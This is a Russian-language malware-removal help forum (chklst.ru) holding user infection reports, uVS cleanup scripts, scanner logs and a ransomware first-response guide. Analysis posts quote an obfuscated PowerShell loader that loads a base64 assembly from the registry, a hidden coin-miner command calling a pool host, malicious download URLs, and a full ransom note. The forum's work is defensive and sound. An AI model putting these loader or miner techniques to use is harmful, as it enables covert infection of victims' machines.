Форум лечения заражений Обсуждение CHKLST.RU — CHKLST.RU

ЕВГЕНИЙ: Плановая проверка

ukh255 — Wed, 23 Mar 2016 13:00:57 +0000

тест

Установила последние обновление в win 11

Люся — Thu, 05 Dec 2024 10:58:50 +0000

Здравствуйте, уважаемые хэлперы. Вчера майкрософт прислали обновления для win11 , установила и пропало около 30 гб места на диске. Обновления не могут же занимать столько места, я думаю. Если возможно, то посмотрите, пожалуйста, что произошло. Заранее признательна.
https://dropmefiles.com/TptTi - полный образ автозапуска

Люся: Компьютер под угрозой.

Люся — Sat, 27 Jun 2020 13:22:49 +0000

Здравствуйте, ребята!
Перестал обновляться MSE. Ничего сделать не могу..Помогите,пожалуйста, господа хэлперы!
http://zalil.su/6077919 - ссылка на полный образ автозапуска.

Вопросы и обсуждение различных средств удаления вирусов

safety — Sat, 07 May 2016 08:20:08 +0000

в AdwCleaner-е (v 5.115) все больше становится рабочих и полезных твиков. Размер исполняемого файла заметно увеличился. (до 3мб). Видимо добавлена локальная база для детектирования. ESET выпустил бетку ESET Internet Security 10, судя по настройкам, добавлена какая то работа с ransomware, надо потестировать на реальных шифраторах.

Как Давид победил Голиафа

safety — Tue, 07 Feb 2023 07:28:29 +0000

К нам обратился Давид с вопросом, почему не все модули защиты включены после установки антивируса Pro32 Total Security. Так же он не смог активировать программу и обновить антивирусные базы.

С его слов, он не смог установить Avast и Kaspersky, а техподдержка не смогла решить вопрос.
Давид предусмотрительно выполнил сканирование системы и предоставил диагностические логи.
Что же мы видим по логам:

;================ Запуск результатов сканирования ==================
17-01-2023 12:18	C:\Program Files\RDP Wrapper\rdpwrap.dll	is an Unwanted-Program ( 00555edb1 )	Невозможно поместить в карантин
17-01-2023 13:16	C:\ProgramData\RunDLL\rundll.exe	is a Trojan ( 005292541 )	Невозможно поместить в карантин
17-01-2023 13:16	C:\ProgramData\RunDLL\system.exe	is an Exploit ( 005560f51 )	Невозможно поместить в карантин
17-01-2023 13:17	C:\ProgramData\Windows Tasks Service\winserv.exe	is an Unwanted-Program ( 005442fc1 )	Невозможно поместить в карантин
17-01-2023 13:17	C:\ProgramData\WindowsTask\MicrosoftHost.exe	is an Adware ( 0055fa291 )	Невозможно поместить в карантин
17-01-2023 13:42	C:\Windows\KMS-R@1nHook.dll	is an Unwanted-Program ( 004d38111 )	Невозможно поместить в карантин
17-01-2023 15:01	C:\Windows\SysWOW64\mintcastnetworks.dll	is a Trojan ( 0001140e1 )	Невозможно поместить в карантин
17-01-2023 13:17	C:\ProgramData\WindowsTask\win.exe	Файл зашифрован!	Ожидается действие ( Не подлежит лечению )
17-01-2023 13:16	C:\ProgramData\RunDLL\2x64.dll	is a Riskware ( 0040eff71 )	Был удален
17-01-2023 13:16	C:\ProgramData\RunDLL\2x86.dll	is a Trojan-Downloader ( 00536df71 )	Был удален

;------------------- Отчет-------------------
;Найденные файлы: 245056
;Просканированные файлы: 243605
;Зараженные файлы: 65
;Таблица разделов просканирована: 0
;просканировано загрузочных секторов : 0
;Проблемы, которые необходимо исправить: 7
;================ Конец результатов сканирования ==================

Логи нас приятно удивили, не потому что система оказалась основательно поражена и заражена, а потому что в этой пораженной системе антивирус PRO32 Total Security смог установиться и обойти все «защитные доспехи и барьеры» этого поистине вирусного Голиафа: множественное активное заражение системы с процедурой восстановления через WMI, блокировку запуска установщиков антивирусных программ, блокировку путей установки антивирусных программ, блокировку доступа к сайтам и ресурсам антивирусных компаний и технических форумов. По словам Давида, после очистки системы вирусные файлы восстанавливались. И здесь без тонких инструментов окончательно победить Голиафа было крайне сложно.

План был простой: очистить систему от Голиафа — Microsofthost.exe, далее восстановить работу модулей защиты антивирусной программы, активировать, обновить базы и выполнить контрольное полное сканирование системы.

Используем uVS для очистки системы. (скрипты uVS индивидуальны для каждого случая).

;uVS v4.13 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

delref HTTP://PW.WEBPUBLIC.ORG/POWER3.TXT')||POWERSHELL.EXE
delref HTTP://PW3CLEAR.DLLCALISO.ORG/POWERC3.TXT')||POWERSHELL.EXE
delref HTTP://PWEAR.DLLCALISO.ORG/PW.TXT')||POWERSHELL.EXE
delwmi %Sys32%\CMD.EXE
delall %SystemDrive%\PROGRAMDATA\WINDOWS TASKS SERVICE\WINSERV.EXE
zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\AUDIODG.EXE
addsgn 1A6E769A552B1E3B8236EFE32D4360156C0186D675489FF2838B3A7AD8D139B3E4ACC1573E559D9B5E870E890EE98FEAAFAC0C7287AFB7A63B3F5BE9D7D4512D 8  Win64/Packed.Themida.L 7

zoo %SystemDrive%\PROGRAMDATA\REALTEK\TASKHOST.EXE
addsgn BA6F9BB2BDD5FF720B9C2D754C2124FBDA75303A02FF85B08FC3813792F5BB0DD4C78774FE1196886F09811A8E1C4939355C045ABD5D982C2D3F21EFB30C9B65 23 Win64/CoinMiner.ACX 7

zoo %SystemDrive%\PROGRAMDATA\REAITEKHD\TASKHOST.EXE
zoo %SystemDrive%\PROGRAMDATA\REAITEKHD\TASKHOSTW.EXE
zoo %SystemDrive%\PROGRAMDATA\REALTEK\TASKHOSTW.EXE
zoo %SystemDrive%\PROGRAMDATA\RUNDLL\RUNDLL.EXE
addsgn 1A97749A5583D38FF42B254E3143FE8E608277F608C27C0BE823B096D3AE614F563348172A68BD4CB899F08A7B374C6964ABE64F77DF23355970992F879F2306 8 Python/Agent.BL [ESET-NOD32] 7

zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\MICROSOFTHOST.EXE
addsgn BA6F9BB2BD5149720B9C2D754C2160FBDA75303A4536D3B4490F09709C1ABD80EFDBA531314A19492B80849F0E95A5EA3156FC561953EC08253A97F48B8B7657 21 Win64/CoinMiner.QG 7

zoo %SystemDrive%\PROGRAMDATA\RUNDLL\SYSTEM.EXE
addsgn 1A7F749A5583368CF42BFB3A88A212FA30F69CB689056A707AD645DC10D61945271703A82B2DFD092BD07B8A327609FA201CBDF9B95B5C082E77A445D0EE667A 8 Win32/Exploit.Equation.M [ESET-NOD32] 7

zoo %SystemDrive%\PROGRAMDATA\RUNDLL\START.EXE
addsgn 1A69149A5583348CF42B254E3143FE53A8CFF4A6020BF7FA793C3A7B5622B50E239C050963979949EC81705B0416A0CD802017F9AA8F3BC07BFC55E8C1F2E631 8 Python/Agent.BT 7

zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\APPMODULE.EXE
addsgn BA6F9BB2BD514E720B9C2D754C2160FBDA75303A6039BC78850F097063164849CB00BB5431C05D8AA8A511953E1549393556B4565D8FF8A18153E4D438F96AF2 8 Win64/CoinMiner.NZ 7

chklst
delvir

deldirex %SystemDrive%\PROGRAMDATA\RUNDLL


regt 14
deltmp
;
;
;
;-------------------------------------------------------------

restart
czoo

После очистки системы от троянов и блокирующих элементов мы перешли к восстановлению работы антивирусной программы.
Выяснилось, что причиной незапуска служб может быть отсутствие прав системы для файлов каталога K7Computing

Добавили Систему с соответствующими разрешениями, все службы антивируса штатно запустились и все модули защиты включились. .

Добавили дополнительно права Системы на другие каталоги и заработало обновление антивирусных баз.

После успешного обновления Давид смог выполнить полное сканирование системы, но к этому моменту остатки Голиафа были найдены только в карантинах. .

(с), chklst.ru

suvandre: плановая проверка

safety — Fri, 23 Dec 2016 07:56:39 +0000

здесь

Плановая проверка
логи uVS 1ый компьютер http://rgho.st/8VpTl5hBk

lsass нагружает ЦП/использует много физической памяти

safety — Mon, 25 May 2020 06:59:21 +0000

Несколько тем ("lsass грузит ЦП") с форума virusinfo.info, которые подчеркивают уникальность функций Universal Virus Sniffer, в частности, обнаружение внедренных потоков в легальные, в том числе и системные процессы:
https://virusinfo.info/showthread.php?t=225067
https://virusinfo.info/showthread.php?t=224966

по второй ссылке решение, к сожалению, не было доведено до конца,
по первой ссылки у пользователя и хелперов хватило времени и терпения, чтобы проверить состояние системы из всех положений: нормального, безопасного, и пассивного из под Live USB

Образ автозапуска из uVS из нор. режима подтвердил наличие скрытого процесса, который внедряет потоки и нагружает процесс lsass.

(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\LSASS.EXE [548], tid=4256
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\LSASS.EXE [548], tid=4280
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\LSASS.EXE [548], tid=4284

tdsskiller ничего не обнаружил из норм. режима

19:02:56.0459 0x0d80 TDSS rootkit removing tool 3.1.0.28 Apr 9 2019 21:11:46
19:02:56.0974 0x0d80 ============================================================
19:02:56.0974 0x0d80 Current date / time: 2020/05/22 19:02:56.0974

19:03:18.0373 0x0c24 ============================================================
19:03:18.0373 0x0c24 Scan finished
19:03:18.0373 0x0c24 ============================================================
19:03:18.0373 0x0dac Detected object count: 0
19:03:18.0373 0x0dac Actual detected object count: 0

FRST нашел заблокированные каталоги и файлы:

==================== FLock ==============================

2020-05-22 12:46 C:\Windows\speechstracing
2020-05-22 16:23 C:\Windows\system32\config\SYSTEM
2020-05-18 19:49 C:\Windows\system32\Drivers\Wdf10283.sys

обнаружить, удалить, или получить копию данного драйвера не получается из нормального, и безопасного режима,
зато из под winpe возможно уже легко обнаружить и зачистить систему.

C:\WINDOWS\SYSTEM32\DRIVERS\WDF10283.SYS
a variant of Win64/Agent.KD
Действительна, однако сертификат УСТАРЕЛ
Xtreaming Technology Inc.
HKLM\uvs_system\ControlSet001\Services\{45487F67-EC9F-4449-A6F2-2D0970F9B80B}\ImagePath
system32\drivers\Wdf10283.sys
тип запуска: На этапе загрузки (0)

Цитата
Загружен скрипт: F:\Support\COMP.TXT
======= Начало исполнения скрипта =======
v400c
OFFSGNSAVE
zoo %Sys32%\DRIVERS\WDF10283.SYS
Копирование файла в Zoo: \\?\C:\WINDOWS\SYSTEM32\DRIVERS\WDF10283.SYS
Файл скопирован в ZOO: F:\SUPPORT\ZOO\WDF10283.SYS._0FC2A538715B6E8A11AC95BB79338AD379B0C830
addsgn 9AFB8488CB82BB1509D49FC070335BDF939E470451A9F4BCFB99DF57546A527C372C97CE664166E35C0A6FDBCA385911799153EBBE9E75957E639F669E993648 32 Trojan:Win64/CryptInject!MTB[Microsoft] 7
Добавлена сигнатура: Trojan:Win64/CryptInject!MTB[Microsoft]
chklst
Проверка списка...
Не удалось открыть файл: C:\WINDOWS\SYSTEM32\WBEM\\WMIPJOBJ.DLL
Проверено файлов: 2942
Найдено вирусов: 1
delvir
Применение изменений...
Копирование файла в Zoo: C:\WINDOWS\SYSTEM32\DRIVERS\WDF10283.SYS
Файл скопирован в ZOO: F:\SUPPORT\ZOO\WDF10283.SYS._0FC2A538715B6E8A11AC95BB79338AD379B0C830
Удаление ссылок...
Удаление файлов...
Завершено процессов: 0 из 0
Изменено/удалено объектов автозапуска 1 из 1
Удалено файлов: 1 из 1

В итоге:

Rootkit.Win64.Agent.bfi

Trojan.Multi.GenAutorunProc.a

safety — Thu, 19 Mar 2020 01:32:21 +0000

по активным некоторое время назад темам Trojan.Multi.GenAutorunProc.a что можно сказать.

симптомы, пример:

заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.

довольно интересная картина происходит, которая может быть скрыта за текстовыми логами.

есть свежая задача Win32Utilities, из которой запущена dll
C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll
6,00 кб, rsAh, создан: 03.03.2020 19:11:07, изменен: 03.03.2020 19:39:19
следующим образом:
rundll32.exe C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll,Task
и все.

что мы видим в образе автозапуска:
во первых обнаружены потоки внедренные в процесс notepad.exe
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\NOTEPAD.EXE [1860], tid=9912
во вторых, видим процесс, связанный так или иначе с запуском notepad.exe, явно связанный с майнером

notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0

а так же видим процессы связанные с запуском powershell

"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);

судя по командной строке, часть командной строки формируется из ключа HKCU:\Software\WinSys32, можно предположить, что значение ключа закодировано в base64

каким образом запущены процессы с участием powershell?

а вот отсюда, часть содержимого windowsdiagnostic.dll:

p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )

какая связь между процессом powershell и notepad?

а вот и явная связь.

по образу видим, что pid=8960 соответствует cmdline:

"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);

а в инфо по notepad видим, что pid=1860 созданный cmdline

"notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0"

но родительский процесс для него parentid=8960

остается найти значение ключа HKCU:\Software\WinSys32, чтобы убедиться, что в нем содержится base64 значение:

действительно, ключ содержит base64 код

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinSys32]
"win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPoAAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAA

после декодирования получаем бинарный файл

+
теперь вирлаб детектирует его как майнер.
ESET-NOD32: A Variant Of MSIL/CoinMiner.BDW

Случайно подхватил вирус который зашифровал мои файлы

safety — Tue, 03 Mar 2020 03:21:23 +0000

Russivak:
Доброго времени.Может Вы мне поможете.Случайно подхватил вирус который зашифровал почти все мои файлы.Букваль но за минут 5.Когда я спохватился сразу вырубил комп.Но проц.90 уже было зашифровано в формате .nosu Может Вы мне поможете советом.

https://drive.google.com/open?id=1W35HjnCgaPRFSxbIwLVBQBTsxpQMvFYl

это фотография которая зашифровалась

Текст выкупа слдующий...

ATTENTION!

Don't worry, you can return all your files!
All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-Oc0xgfzC7q
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.

To get this software you need write on our e-mail:
helpmanager@firemail.cc

Reserve e-mail address to contact us:
helpmanager@iran.ir

Your personal ID:
0197nTsddc0RliqQe05lgLmqgyYsmR6pB1gd8qDmnDCDgjrvu

Взломали почту..

Люся — Sat, 28 Sep 2019 15:27:08 +0000

Здравствуйте уважаемые хэлперы! Сегодня, пока я спала, кто-то из города Баку заходил в мою почту..Напрягает это.
Полный образ автозапуска сделала..

после заражения не могу очистить систему

lenn11 — Fri, 12 Jul 2019 22:56:48 +0000

здравствуйте. не получается полностью очистить компьютер от заражения после того как скачала крякнутую программу.проверяла разными антивирусами и тд.. что то нашлось,удаляла,но не все. нортон нашел вирус в реестре,а удалить не смог и ту же самую инфекцию постоянно находит Rkill! удалить это не получается,перепробовала многое.так же, случайно увидила при просмотре диспетчера задач,в процессах,все время отображаются несколько вкладок браузера аваст,при том, что сам браузер не запущен.отключила службу автообновления,но это не сработало.что странно, в свойствах процесса-вкладка безопасность,имя пользователя обозначена незнакомая учетная запись. и это та же ветка реестра,в которой нортон и Rkill находят тот самый не убиваемый вирус.далее проверила утилитой RogueKiller,во вкладке процессы был обнаружен nokill tr.zeus.я не очень разобралась как работает эта прога,вроде бы она лишь находит вред проц,но не удаляет сами файлы..в общем, после 1 очистки ничего не поменялось и при повторной проверке тот же процесс был обнаружен снова, только с новым PID.после повторной очистки зараженный процесс больше выявлен не был.как обстоит дело на самом деле,остался ли троян в системе, понять не могу((.но Rkill продолжает находить всю ту же заразу в реестре. помогите пож разобраться.заранее спасибо!

Восстановление баз данных 1С. В формате SQL.

s_pol — Mon, 17 Jun 2019 12:24:53 +0000

Часть баз данных на сервере, оказалась зашифрована. В каталоге баз данных имя базы прежнее, но с расширением PZDC.

Невозможно установить антивирус

Max — Tue, 30 Apr 2019 03:51:53 +0000

Здравствуйте, сразу хочу сказать, что антивирус ESET лицензионный, почему на форуме странные правила не понимаю.
Посоветовали создать тему тут:

если этот файлик попал в карантин ESET
C:\USERS\ELENA\APPDATA\LOCAL\TEMP\SETH.BAT
пробуйте восстановить его с другим расширением, например, *.vvvbat и добавить его в архиве на форум

https://www.sendspace.com/file/amgmtq пароль на архив 123 иначе ESET его убивает

вопрос:
кейлоггер
Trojan.RefogKeyLogger, C:\ProgramData\MPK\MIPKO Employee Monitor\MIPKO Employee Monitor.lnk, Помещено в карантин, [1258], [180776],1.0.10268
сами ставили в системе?

Сам ничего не ставил, перед этим никакие ПО тоже не ставил. Недели полторы точно.

Первые шаги в работе с заражением Ransomware

safety — Sat, 05 Jan 2019 04:05:19 +0000

Инфекции вымогателей могут быть уникальными во многих отношениях. Самое главное, что привычки, которые обычно правильны при работе с вредоносными программами, могут ухудшить ситуацию при работе с вымогателями. Пожалуйста, ознакомьтесь с приведенной ниже инструкцией в качестве руководства по борьбе с заражением вымогателями.

Не удаляйте сразу тела файлов шифраторов
Естественная реакция большинства пользователей заключается в том, чтобы сначала удалить инфекцию как можно быстрее. Этот инстинкт, к сожалению, неверен. В большинстве случаев нам потребуется исполняемый файл шифратора, чтобы выяснить, что именно шифратор сделал с вашими файлами. Поиск правильного образца вымогателей становится бесконечно более сложным, когда вы удалили инфекцию и не можете предоставить нам вымогателей. Можно отключить заражение, отключив все записи автозапуска, указывающие на него, или поместив заражение в карантин. Однако важно не удалять его из карантина или удалять вредоносные файлы сразу без резервного копирования.

Отключите любое программное обеспечение для оптимизации и очистки системы
Многие вымогатели будут хранить либо сами, либо необходимые файлы в папке временных файлов. Если вы используете инструменты очистки или оптимизации системы, такие как CCleaner, BleachBit, Glary Utilities, Clean Master, Advanced SystemCare, Wise Disk / Registry Cleaner, Wise Care, Auslogics BoostSpeed, System Mechanic или что-либо подобное, немедленно отключите эти инструменты и убедитесь, что автоматические запуски не запланированы. В противном случае эти приложения могут удалить зараженные или необходимые файлы-вымогатели из вашей системы, которые могут потребоваться для восстановления ваших данных.

Создайте резервную копию ваших зашифрованных файлов
Некоторые вымогатели имеют скрытые полезные нагрузки, которые будут удалять и перезаписывать зашифрованные файлы через определенное время. Расшифровщики также могут быть не на сто процентов точными, поскольку вымогатель часто обновляется или просто глючит и может повредить файлы в процессе восстановления. В этих случаях лучше использовать зашифрованную резервную копию, чем не иметь ее вообще. Поэтому мы настоятельно рекомендуем вам сначала создать резервную копию ваших зашифрованных файлов, прежде чем делать что-либо еще.

Если пострадал сервер: выясните точку входа и закройте ее
Особенно в последнее время мы видели много заражений серверов. Обычный способ - это перебор паролей пользователей через RDP / Remote Desktop. Мы настоятельно рекомендуем вам проверить журналы событий на наличие большого количества попыток входа в систему. Если вы обнаружите такие записи или если ваш журнал событий будет пустым, ваш сервер был взломан через RDP. Крайне важно немедленно изменить все пароли учетных записей пользователей. Мы также предлагаем отключить RDP, если это возможно, или хотя бы изменить порт.

Кроме того, важно проверить все учетные записи пользователей на сервере, чтобы убедиться, что злоумышленники не создали собственных учетных записей, которые позволили бы им позднее получить доступ к системе.

Выясните, какой из вымогателей заразил вас
И последнее, но не менее важное: важно определить, какой вымогатель заразил вас. Такие сервисы, как VirusTotal, который позволяет вам сканировать вредоносные файлы, и ID Ransomware, который позволяет загружать записку с выкупом и зашифрованные файлы для идентификации семейства вымогателей, невероятно полезны, и мы, вероятно, в конечном итоге попросим вас предоставить результаты любого из этих Сервисов. Таким образом, предоставляя их сразу, вы можете ускорить процесс возврата ваших файлов.

https://support.emsisoft.com/topic/29386-first-steps-when-dealing-with-ransomware/

Страничку в контакте взламывают по 2 раза за вечер. Может вирусная активность?

Люся — Thu, 20 Sep 2018 20:18:17 +0000

Дорогие хелперы! Мою страничку подозрительно часто стали взламывать злоумышленники и рассылать от моего имени просьбы материального характера. Может вирус какой сидит?
Образ автозапуска http://rgho.st/65wQ7RNYc
Посмотрите, пожалуйста:)

SpyHunter что за зверь? используете ли?

hrol — Tue, 05 Jun 2018 08:58:24 +0000

вот посоветовали утилиту. во-первых что это такое? есть ли опыт использования?
во-вторых откудас качать, чтоб ещё больше в компьютер не внести заразы, если уже есть что-то?
прим.: собссно хочу найти гадость которая иногда открывает "левые" сайты вместо нужных ссылок.

Медленно загружается браузер, пишет ошибка в профиле

Люся — Fri, 04 May 2018 11:37:51 +0000

Добрый день, хэлперы. Что-то стал медленно загружаться браузер, пишет - ошибка в профиле, ошибка синхронизации.. Может какую гадость "подцепила"..
Образ автозапуска http://rgho.st/6Lw5FlJWS

Случайно установился аваст, помогите убрать, пожалуйста.

Люся — Tue, 16 Jan 2018 14:21:30 +0000

Добрый вечер,господа хелперы! Во время скачивания актуальной версии ссleaner, не убрала галочку - скачать аваст. Теперь в системе ужас что творится. Я скачала утилиту для удаления аваста,но в хр в безопасный режим не войти, а в обычном она не удаляет его..Помогите, пожалуйста. Если возможно,то побыстрее..

Подцепила троян, после лечения активного заражения, хотела проверить - все в порядке?

Люся — Mon, 05 Feb 2018 08:58:40 +0000

Здравствуйте! Зашла в систему, касперский красный, как рак..Даже слетели ключи. Хорошо,что они в личном кабинете хранятся..Все восстановила,но нужно посмотреть образ,если можно..

http://rgho.st/7lQSP7PZB

Проверить на вирусы

Люся — Thu, 23 Nov 2017 18:50:41 +0000

Уважаемые хэлперы. Уже в который раз взламывают мою страничку в контакте, рассылают от моего имени всякую ерунду. Пароли достаточно надежные ( придумывают айтишники на работе). С использованием чисел, регистра, никаких имен..Возможно вирус-кейлоггер сидит, ворует пароли? хотела бы убедиться, что это не так..Посмотрите,пожалуйста образ автозапуска.

http://rgho.st/6BR9ZMCm2

Не могу полностью удалить avg

Люся — Thu, 12 Oct 2017 20:05:59 +0000

Добрый вечер, господа хелперы! Скачала утилиту для удаления avg, сильно стал нагружать систему (последние версии ресурсозависимые, а у меня система слабая).. Из разных режимов пробовала удалить ( и из безопасного тоже),но вижу,что не удалилась..Помогите, пожалуйста. Напишите волшебный скрипт для удаления avg/
Уже поставила бесплатный от Майкрософт,но вижу еще avg присутствует.
Образ автозапуска http://rgho.st/6BgfJ9Y2K

не включается сетевой адаптер

hrol — Thu, 31 Aug 2017 15:39:00 +0000

адаптер Marvell встроенный в мать gygabyte
драйвер не обновляется

хотел установить модем 3G , тоже не дает
подозреваю вирусяку.
Малварей прогнал, но не обновленной, 50 подозрительных файлов удалил.
/вообще машина очень как бы помягче сказать ЗАМУСОРЕННАЯ/
адаптер не заработал

образ системы прилагаю.
http://rgho.st/7p94StfZX

помогите друзья на пиво заработать

не было доступа к free.drweb.ru/cureit

hrol — Thu, 31 Aug 2017 15:30:40 +0000

приветсвую! давно не был, надеюсь, у всех всё более менее в порядке
/сразу два компа потому две темы создам /

личный комп, хочу планово проверить.
че было:
1. браузер Maxthon не все сайты открывал, ну и какие-то тормоза (мне казалось) по скорости инета
/инет правда на 4g (LTE) модеме в лесу/
2. сегодня сделал клон HDD. запустил систему.
3. и тут меня осенило, что рядом стоящий комп не работает/не выходит в сеть из-за вирусов, а я флешкой туда-сюда логи таскаю...
4. решил провериться скачав DrCure it ну и паралельно запустил Malwarebytes
5. пока малварь обновляла сигнатуры, я пошел на https://free.drweb.ru/cureit а меня не пускают! "невозможно отобразить... че-то там"
6. 6. ну всё думаю, приплыли... начал пароль от форума вспоминать, логины там всякие...пока малварь чекала систему
7. нашла она один Adware.FileTour по адресу: C:\Users\*name*\Appdata\Local\setap.exe
8. удалила, перезагрузка...
9. и вот я перед созданием темы опять на сайт ДРВЕБ попробовал зайти и всё прекрасно открылось...

но я всё-таки же уже сделал ОБРАЗ, не пропадать ведь добру
прошу помогите проверить
в общем выкладываю образ и заодно хочу спросить
http://rgho.st/8p65VpFg8
dropmefile.com не пробовали пользоваться? удобная штука. http://dropmefiles.com/C9nXs

Проблема с загрузкой видео из youtube

пельмешка — Mon, 05 Jun 2017 10:41:20 +0000

https://sendspace.com/file/arc7d1

Baidu и прочее

Bumblebee — Thu, 23 Mar 2017 17:25:48 +0000

Приветствую от погибшего писихелпа) Ноут подростка, зараза завелась, посмотрите логи )
uVS

помогите решить проблему

Толеби — Tue, 21 Mar 2017 20:43:09 +0000

Virus решение...

Подозрение на заражение

Serega_490101 — Tue, 03 Jan 2017 10:15:41 +0000

С наступившим Новым Годом!

Создаю новый почтовый ящик на яндексе. Через некоторое время (обычно несколько дней) после этого при входе в него появляется сообщение о том, что почтовый ящик заблокирован из-за подозрения на взлом. При этом со старым ящиком такого не происходит.
Прикладываю лог uVS

piton331: Заражен браузер

piton331 — Sat, 30 Jul 2016 16:58:20 +0000

Доброго времени суток уважаемые хелперы. Случилась такая беда: в браузере непонятные редиректы, открываются левые ссылки. Антивирус комодо ничего не нашел. Выручайте. Спасибо.

ivanovpro777: Плановая проверка

ivanovpro777 — Fri, 02 Oct 2015 15:50:17 +0000

Компьютер поступил в ремонт с проблемой NTLDR is missing Что было мною проделано: 1) проверка через Victoria - диск здоров 2) применение команд Fixboot и Fixmbr через консоль восстановление установочного диска Windows XP 3) заменил sata шлейф и менял порты подключения 4) Загрузился с LiveCD проверил, раздел С читается (он один на диске), свободного места почти 250 Гб Что дальше делать я не знаю...

Удаляем Baidu, BaiduAn, BaiduSD, 360safe и прочее

safety — Wed, 19 Nov 2014 22:13:53 +0000

Одна из проблем на форумах безопасности - нашествие полчищ китайских антивирусов: baidu, baiduAn, BaiduSD, 360safe с цифровыми подписями от Qihoo 360 Software (Beijing) Company Limited, Beijing baidu Netcom science and technology co.ltd, и др. Избавиться от нежелательных защитников системы в отличие от их установки бывает не так просто. Через "установку_удаление программ", как правило проблема не решается. В итоге пользователь пускает в ход самые разные способы удалений с использованием различного набора программ (Combofix, malwarebytes, hj, AdwCleaner, AVZ, OTL, cureit и другие) пытаясь избавиться от густо населенной популяции модулей этого антивируса из безопасного или нормального режима работы системы. Казалось бы наступило долгожданное избавление, ан, нет, baidu жив, baidu воскрес, baidu продолжает нагружать систему под самый потолок. Прежде всего один из выводов, полученных в ходе очистки системы: - не надо пытаться удалить все и вся одним скриптом, одной чисткой. 1. Необходимо исключить модули, сервисы, драйвера этого антивируса из автозапуска. Для этого используем Universal Virus Sniffer. И создаем полный образ автозапуска. (Пример такого файла во вложении) Используем в uVS для исключения защищенных ссылок реестра метод безопасной виртуализации. итак, исключаем скриптом указанные сервисы, драйвера и модули из автозапуска.

;uVS v3.85 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE

sreg

